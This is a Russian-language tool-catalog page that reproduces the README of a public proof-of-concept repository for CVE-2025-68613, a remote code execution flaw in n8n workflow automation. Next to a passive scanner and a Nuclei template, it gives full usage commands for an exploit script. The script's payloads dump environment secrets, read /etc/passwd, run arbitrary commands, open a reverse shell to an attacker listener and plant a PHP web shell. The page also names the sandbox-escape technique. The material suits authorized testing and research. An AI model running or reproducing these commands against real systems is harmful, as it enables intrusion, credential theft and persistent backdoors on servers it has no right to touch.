Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-68613-POC — Публичный PoC + сканер и исследование для CVE-2025-68613: критическое RCE в n8n Workflow Automation через инъекцию выражений (CVSS 10.0). Включает инструменты обнаружения, полный эксплойт и рекомендации по устранению уязвимости. | Kitploit
Инструменты/GitHubGitHub/thestingr/cve-2025-68613-poc
РазведкаСканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Red Teaming
Разработка Полезной Нагрузки
GitHubthestingr/cve-2025-68613-poc

CVE-2025-68613-POC

Публичный PoC + сканер и исследование для CVE-2025-68613: критическое RCE в n8n Workflow Automation через инъекцию выражений (CVSS 10.0). Включает инструменты обнаружения, полный эксплойт и рекомендации по устранению уязвимости.

Репозиторий
26219 месяцев назадПроверено Kitploit
Поделиться

🚨 CVE-2025-68613: Критическая RCE-уязвимость в n8n

Language: Python CVSS Score: 10.0 Critical Exploit Status: Proof of Concept Available CVE Status: CVE-2025-68613 Disclosed Version: v1.0.2 Target Platform: n8n

CVE-2025-68613 PoC - TechSquad RedTeam

Оглавление

  1. Обзор
  2. Что такое n8n?
  3. Основы уязвимости
  4. Технические детали
  5. Затронутые версии
  6. Механика эксплуатации
  7. Реальное влияние
  8. Методы обнаружения
  9. Устранение и смягчение рисков
  10. Ресурсы и ссылки

Обзор

CVE-2025-68613 — это критическая уязвимость удалённого выполнения кода (RCE), обнаруженная в n8n, популярной платформе автоматизации рабочих процессов с открытым исходным кодом. Эта уязвимость позволяет аутентифицированным пользователям выполнять произвольный код на сервере, что потенциально может привести к полной компрометации системы.

Краткие факты

  • Идентификатор CVE: CVE-2025-68613
  • Оценка CVSS: 9.9 - 10.0 (Critical)
  • Тип уязвимости: Инъекция выражений → удалённое выполнение кода
  • CWE: CWE-913 (Improper Control of Dynamically-Managed Code Resources)
  • Вектор атаки: Сеть
  • Требуется аутентификация: Да (низкие привилегии — доступ администратора не требуется) |- Статус: Доступен PoC (подтверждено на v1.121.0)

Что такое n8n?

n8n — это платформа автоматизации рабочих процессов с открытым исходным кодом, которая позволяет пользователям:

  • Подключать различные API, базы данных и сервисы
  • Автоматизировать повторяющиеся бизнес-процессы
  • Создавать сложные рабочие процессы без глубоких знаний программирования
  • Разворачивать локально (on-premises) или в облаке

Почему n8n — критическая инфраструктура

Организации используют n8n для:

  • Интеграции баз данных с облачными сервисами
  • Автоматизации конвейеров обработки данных
  • Подключения CRM, ERP и внутренних систем
  • Управления конфиденциальными данными и учётными данными API

Такая центральная роль в ИТ-инфраструктуре делает уязвимости особенно опасными, поскольку они могут предоставить злоумышленникам доступ к целым сетям и конфиденциальным данным.


Инструменты в этом репозитории

Этот репозиторий содержит готовые к использованию инструменты для обнаружения уязвимости и проверки эксплуатации:

1. Сканер: cve-2025-68613-scanner.py

Назначение: безопасное обнаружение уязвимых экземпляров n8n без эксплуатации

Возможности:

  • Пассивное определение версии по HTTP-ответам
  • Аутентификация не требуется
  • Полезная нагрузка не выполняется
  • Проверяет несколько распространённых путей (/, /rest/settings, /healthz, /api/v1/health)
  • Безопасен для авторизованных оценок безопасности

Использование:```bash python3 cve-2025-68613-scanner.py -u http://target:5678

**Вывод**:
- Код выхода 0: уязвимость не обнаружена
- Код выхода 1: версия не определена (возможно, исправлена или скрыта)
- Код выхода 2: обнаружена уязвимая версия

### 2. Шаблон Nuclei: `CVE-2025-68613.yaml`
**Назначение**: автоматическое обнаружение уязвимостей и базовое тестирование вычисления выражений

**Возможности**:
- Требуется действительный токен аутентификации
- Проверяет возможность внедрения выражений
- Пытается прочитать глобальный контекст Node.js (process.platform)
- Создаёт тестовые сценарии для проверки вектора RCE
- Классификация уровня критичности: CVSS 10.0 Critical

**Использование**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v

# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt

3. Полный эксплойт: exploit_cve-2025-68613.py

Назначение: Полноценный эксплойт proof-of-concept с несколькими атакующими пейлоадами

Возможности:

  • Полная обработка аутентификации
  • Несколько эксплойт-пейлоадов:
    • info: Сбор информации о системе (ОС, архитектура, версия Node.js, текущий пользователь)
    • cmd: Выполнение произвольных системных команд
    • env: Извлечение всех переменных окружения (раскрывает учётные данные, API-ключи, секреты)
    • read: Чтение конфиденциальных файлов из файловой системы (SSH-ключи, конфигурационные файлы и т.д.)
    • write: Запись файлов в файловую систему (закрепление, бэкдоры и т.д.)
    • revshell: Установка reverse shell-соединения для интерактивного доступа
  • Автоматическая очистка воркфлоу
  • Обработка ошибок и отчёт о статусе

Требования:

  • Действительные учётные данные пользователя n8n (email/пароль)
  • Python 3.6+ с библиотекой requests
  • Сетевой доступ к целевому инстансу n8n

Установка:```bash pip install requests chmod +x exploit_cve-2025-68613.py

**Примеры использования**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload info

# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload cmd --command "whoami"

# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload env

# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload read --file "/etc/passwd"

# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444

# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload write \  
  --file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'

Как это работает:

  1. Выполняет аутентификацию в n8n, используя предоставленные учетные данные
  2. Создает вредоносный рабочий процесс с полезной нагрузкой инъекции выражений
  3. Полезная нагрузка выходит из песочницы выражений с помощью this.constructor.constructor()
  4. Выполняет полезную нагрузку через process.platform или другие Node.js API
  5. Получает результаты выполнения рабочего процесса
  6. Выполняет очистку, удаляя тестовый рабочий процесс

Коды выхода:

  • 0: Успешная эксплуатация
  • 1: Не удалась аутентификация или эксплуатация

Основы уязвимости

В чём проблема?

Простыми словами: n8n позволяет пользователям писать выражения в рабочих процессах для динамической обработки данных. Однако эти выражения выполняются без надлежащей песочницы, что позволяет злоумышленникам выйти за пределы предполагаемого контекста выполнения и запускать произвольный код на сервере.

Суть проблемы

Когда вы создаете рабочий процесс в n8n, вы можете использовать «выражения» для манипуляции данными. Предполагается, что эти выражения выполняются в ограниченной среде. Однако уязвимость показывает, что эти выражения могут получить доступ к базовой системе, что позволяет злоумышленнику:

Скачать инструмент